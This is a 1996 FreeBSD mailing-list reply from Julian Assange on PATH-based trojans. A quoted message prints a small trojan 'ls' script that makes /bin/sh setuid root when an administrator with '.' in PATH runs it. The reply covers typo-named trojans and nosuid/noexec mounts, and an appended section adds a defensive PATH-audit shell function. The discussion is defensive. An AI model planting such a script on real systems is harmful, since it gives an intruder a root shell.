Date: Tue, 25 Jun 1996 20:27:06 +1000 (EST)
From: Julian Assange <proff@suburbia.net>
To: vince@mercury.gaianet.net (-Vince-)
Cc: hackers@freebsd.org
Subject: Re: I need help on this one - please help me track this guy down!
Message-ID: <199606251027.UAA25956@suburbia.net>
In-Reply-To: <Pine.BSF.3.91.960625003302.21697j-100000@mercury.gaianet.net> from "-Vince-" at Jun 25, 96 00:33:59 am

> > Assume root has "." in its path. Hacker puts this little script in
> > his dir, maybe also in /tmp/; it's called "ls" (imagine the
> > coincidence), and it's executable by all:
> >
> > #!/bin/sh
> > chown root /bin/sh > /dev/null 2>&1
> > chmod u+s,a+x /bin/sh > /dev/null 2>&1
> > ls $*
> >
> > Then sits back and waits for the sysadmin to come along and type "ls"
> > in one of those directories.
> >
> > Pop quiz: what is the result?
>
> Never thought about that one....
>
> Vince

The result is nothing, unless root's path is ".:$PATH" - hardly a common
occurrence. What does achieve more success is placing common typographical
mistakes in the path as trojans. e.g. "sl" or "sl-la" or "ls-la" etc. For this
reason only root should not have "." appended to the system path.

I created kernel level trust circles, so untrusted executables will not be
executed. Untrusted is defined as
file uid >10 && (file uid !=euid || file uid != uid) || file mode &022.
This is not in -current. I hadn't bothered to submit it as I thought it was a
little standards breaking (or was that standards creating ?;) A sysctl perhaps.
Are people interested in this?

But in terms of temp directories and spool directories, these should all be
mounted nosuid, noexec, nodev, which solves your problem anyway, and without
kernel hackery.

--
"Of all tyrannies a tyranny sincerely exercised for the good of its victims
may be the most oppressive. It may be better to live under robber barons
than under omnipotent moral busybodies. The robber baron's cruelty may
sometimes sleep, his cupidity may at some point be satiated; but those who
torment us for our own good will torment us without end, for they do so with
the approval of their own conscience." - C.S. Lewis, _God in the Dock_
+---------------------+--------------------+----------------------------------+
|Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
|proff@suburbia.net   | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
|proff@gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
+---------------------+--------------------+----------------------------------+
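
Added example, not part of the original message or of any FreeBSD code: a POSIX sh function that audits a PATH string for the condition discussed above, a "." entry or an empty entry (which the shell also searches as the current directory). As a generalization beyond the message it also flags relative entries and PATH directories that are group- or world-writable, borrowing the "mode & 022" test from the message's definition of untrusted; the name audit_path and the finding labels are made up for this example.

```sh
#!/bin/sh
# Added example (not from the original message): audit a PATH string.
# audit_path and the finding labels are hypothetical names for this sketch.
# Prints one finding per line; returns 0 if the PATH is clean, 1 otherwise.
audit_path() {
    ap_findings=0
    ap_rest="$1:"            # trailing ":" so a final empty entry is still seen
    while [ -n "$ap_rest" ]; do
        ap_entry=${ap_rest%%:*}      # text before the first ":"
        ap_rest=${ap_rest#*:}        # everything after it
        case "$ap_entry" in
            "") echo "EMPTY: empty entry, searched as the current directory" ;;
            .)  echo "DOT: \".\" entry, searches the current directory" ;;
            /*)
                # Absolute entry: apply the message's "mode & 022" test to the
                # directory itself (-H follows a symlinked entry such as /bin).
                [ -d "$ap_entry" ] || continue
                ap_hit=$(find -H "$ap_entry" -prune \
                         \( -perm -020 -o -perm -002 \) -print)
                [ -n "$ap_hit" ] || continue
                echo "WRITABLE: $ap_entry is group- or world-writable" ;;
            *)  echo "RELATIVE: $ap_entry resolves against the current directory" ;;
        esac
        ap_findings=$((ap_findings + 1))
    done
    [ "$ap_findings" -eq 0 ]
}

# Report on the invoking user's PATH when run as a script.
audit_path "$PATH" || echo "PATH needs attention"
```

Run it from root's login shell so that the PATH being checked is the one root actually uses.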